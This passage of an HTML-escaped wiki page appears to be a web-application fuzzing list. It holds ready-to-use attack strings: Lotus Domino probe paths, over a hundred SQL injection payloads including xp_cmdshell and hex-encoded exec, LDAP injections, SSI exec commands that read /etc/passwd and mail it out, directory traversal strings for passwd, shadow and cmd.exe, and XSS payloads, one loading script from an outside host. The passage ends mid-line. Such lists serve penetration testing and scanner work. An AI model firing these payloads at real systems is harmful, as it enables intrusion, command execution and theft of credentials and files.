/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
